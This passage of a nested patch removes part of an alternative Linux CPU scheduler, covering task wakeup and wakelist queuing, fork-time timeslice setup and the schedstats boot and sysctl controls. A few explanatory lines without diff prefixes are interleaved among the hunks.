-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/* Alt schedule FW TODO:
-+		 * How to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is to change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
-+	 * It races such that false-negatives are possible, since they
-+	 * are shorter lived than false-positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rq's wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee CPU is idle, or the task is descheduling and is the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0,
-+	 * p->on_cpu can be whatever, we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
-+ *   bits set. This allows distinguishing all wakeup scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However, for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that led to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smp_rmb() lives in try_invoke_on_locked_down_task().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about its own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, consider queueing p on the remote CPU's wake_list
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since p->pi_lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in its current state by avoiding wakeups and/or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
-+
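A sketch of a conforming callback (hypothetical, not from this patch): it stays lightweight because it can run under a runqueue lock, and reads only the fields the comments above call out as stabilized:

	static int read_task_state(struct task_struct *p, void *arg)
	{
		*(unsigned int *)arg = READ_ONCE(p->__state);
		return p->on_rq;	/* handed back by task_call_func() */
	}

Invoked as task_call_func(p, read_task_state, &state); the pi_lock (and the rq lock when needed) is taken and released around the call by task_call_func() itself.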
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child so that the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
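Concretely, for the split above: a parent with 4 ms of slice left at fork keeps 2 ms and the child starts with 2 ms, so the system-wide pending timeslice stays at 4 ms; only when the halved slice falls below RESCHED_NS does the child instead receive a full sched_timeslice_ns while the parent is marked for reschedule.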
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
-+
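In practice the hook above means booting with schedstats=enable (or =disable) flips the static branch before init runs, while the kernel.sched_schedstats sysctl registered below exposes the same toggle at runtime.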
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
